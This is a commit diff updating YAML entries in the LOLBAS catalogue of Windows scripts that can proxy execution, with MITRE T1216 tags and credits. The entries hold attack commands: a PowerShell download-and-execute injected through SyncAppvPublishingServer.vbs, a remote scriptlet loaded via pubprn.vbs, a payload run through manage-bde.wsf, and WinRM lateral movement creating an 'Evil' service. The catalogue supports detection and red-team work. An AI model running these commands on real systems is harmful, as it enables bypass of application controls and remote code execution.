Update scripts with new template. Fixed mgmt script for webportal. Adjustments to existing yml files

yml/OSScripts/CL_mutexverifiers.yml

@@ -1,18 +1,28 @@
 ---
 Name: CL_Mutexverifiers.ps1
-Description: Execute
-Author: ''
+Description:
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
-  - Command: ". C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1"
+  - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Mutexverifiers.ps1   \nrunAfterCancelProcess calc.ps1
     Description: Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
-  - C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
+Code Sample: 
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/pabraeken/status/995111125447577600
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)
+  - Link: https://twitter.com/pabraeken/status/995111125447577600
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+---

yml/OSScripts/Cl_invocation.yml

@@ -1,20 +1,30 @@
 ---
 Name: CL_Invocation.ps1
-Description: Execute
-Author: ''
+Description: Aero diagnostics script
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args]
     Description: Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
-  - C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
-  - C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
+  - Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
+  - Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
+Code Sample: 
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
-  - https://twitter.com/bohops/status/948548812561436672
-  - https://twitter.com/pabraeken/status/995107879345704961
-Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)
+  - Link: 
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+---

yml/OSScripts/Manage-bde.yml

@@ -1,19 +1,37 @@
 ---
 Name: Manage-bde.wsf
-Description: Execute
-Author: ''
+Description: Script for managing BitLocker
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
     Description: Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
+    Usecase: Proxy execution from script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
     Description: Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
+    Usecase: Proxy execution from script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - C:\Windows\System32\manage-bde.wsf
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\System32\manage-bde.wsf
+Code Sample: 
+  - Code:
+Detection:
+  - IOC: Manage-bde.wsf should normally not be invoked by a user
 Resources:
-  - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
-  - https://twitter.com/bohops/status/980659399495741441
-Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)
+  - Link: https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
+  - Link: https://twitter.com/bohops/status/980659399495741441
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
+  - Person: Daniel Bohannon
+    Handle: '@danielbohannon'
+---

yml/OSScripts/Pubprn.yml

@@ -1,20 +1,29 @@
 ---
 Name: Pubprn.vbs
-Description: Execute
-Author: ''
+Description:
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
-    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
+    Description: Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
-  - C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
-Code Sample:
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Pubprn_calc.sct
-Detection: []
+  - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
+  - Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
+Code Sample: 
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
+Detection:
+  - IOC:
 Resources:
-  - https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://github.com/enigma0x3/windows-operating-system-archaeology
-Notes: Thanks to Matt Nelson - @enigma0x3
+  - Link: https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://github.com/enigma0x3/windows-operating-system-archaeology
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+---

yml/OSScripts/Slmgr.yml

@@ -1,20 +1,31 @@
 ---
 Name: Slmgr.vbs
-Description: Execute
-Author: ''
+Description: Script used to manage windows license activation
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
-    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
+    Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - c:\windows\system32\slmgr.vbs
-  - c:\windows\sysWOW64\slmgr.vbs
-Code Sample:
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
-Detection: []
+  - Path: C:\Windows\System32\slmgr.vbs
+  - Path: C:\Windows\SysWOW64\slmgr.vbs
+Code Sample: 
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
+Detection:
+  - IOC:
 Resources:
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://www.youtube.com/watch?v=3gz1QmiMhss
-Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+  - Person: Casey Smith
+    Handle: '@subtee'
+---

yml/OSScripts/Syncappvpublishingserver.yml

@@ -1,17 +1,29 @@
 ---
-Name: SyncAppvPublishingServer.vbs
-Description: Execute
-Author: ''
+Name: Syncappvpublishingserver.vbs
+Description: Script used related to app-v and publishing server
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
     Description: Inject PowerShell script code with the provided arguments
+    Usecase: Use Powershell host invoked from vbs script
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\Windows\System32\SyncAppvPublishingServer.vbs
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
+Code Sample: 
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/monoxgas/status/895045566090010624
-  - https://twitter.com/subTee/status/855738126882316288
-Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee
+  - Link: https://twitter.com/monoxgas/status/895045566090010624
+  - Link: https://twitter.com/subTee/status/855738126882316288
+Acknowledgement:
+  - Person: Nick Landers
+    Handle: '@monoxgas'
+  - Person: Casey Smith
+    Handle: '@subtee'
+---

yml/OSScripts/Winrm.yml

@@ -1,28 +1,54 @@
 ---
-Name: Winrm.vbs
-Description: Execute
-Author: ''
+Name: winrm.vbs
+Description: Script used for manage Windows RM settings
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
     Description: Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
-  - Command: winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
-    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
-  - Command: winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
-    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
+  - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985'
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
+  - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985   \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985'
+    Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - C:\windows\system32\winrm.vbs
-  - C:\windows\SysWOW64\winrm.vbs
-Code Sample:
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr.reg
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/Payload/Slmgr_calc.sct
-Detection: []
+  - Path: C:\Windows\System32\winrm.vbs
+  - Path: C:\Windows\SysWOW64\winrm.vbs
+Code Sample: 
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr.reg
+  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct
+Detection:
+  - IOC:
 Resources:
-  - https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
-  - https://www.youtube.com/watch?v=3gz1QmiMhss
-  - https://github.com/enigma0x3/windows-operating-system-archaeology
-  - https://redcanary.com/blog/lateral-movement-winrm-wmi/
-  - https://twitter.com/bohops/status/994405551751815170
-Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)
-
+  - Link: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
+  - Link: https://www.youtube.com/watch?v=3gz1QmiMhss
+  - Link: https://github.com/enigma0x3/windows-operating-system-archaeology
+  - Link: https://redcanary.com/blog/lateral-movement-winrm-wmi/
+  - Link: https://twitter.com/bohops/status/994405551751815170
+Acknowledgement:
+  - Person: Matt Nelson
+    Handle: '@enigma0x3'
+  - Person: Casey Smith
+    Handle: '@subtee'
+  - Person: Jimmy
+    Handle: '@bohops'
+  - Person: Red Canary Company cc Tony Lambert
+    Handle: '@redcanaryco'
+---

yml/OSScripts/pester.yml

@@ -1,18 +1,27 @@
 ---
-Name: pester.bat
-Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
-Author: ''
+Name: Pester.bat
+Description: Used as part of the Powershell pester
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
-  - Command: Pester.bat [/help|?|-?|/?] "$null; notepad"
-    Description: Execute notepad
+  - Command:  Pester.bat [/help|?|-?|/?] "$null; notepad"
+    Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad
+    Usecase: Proxy execution
+    Category: Execute
+    Privileges: User
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
+    OperatingSystem: Windows 10
 Full Path:
-  - c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
-  - c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
-Code Sample: []
-Detection: []
+  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
+  - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
+Code Sample: 
+  - Code:
+Detection:
+  - IOC:
 Resources:
-  - https://twitter.com/Oddvarmoe/status/993383596244258816
-  - https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
-Notes: Thanks to Emin Atac - @p0w3rsh3ll
+  - Link: https://twitter.com/Oddvarmoe/status/993383596244258816
+Acknowledgement:
+  - Person: Emin Atac
+    Handle: '@p0w3rsh3ll'
+---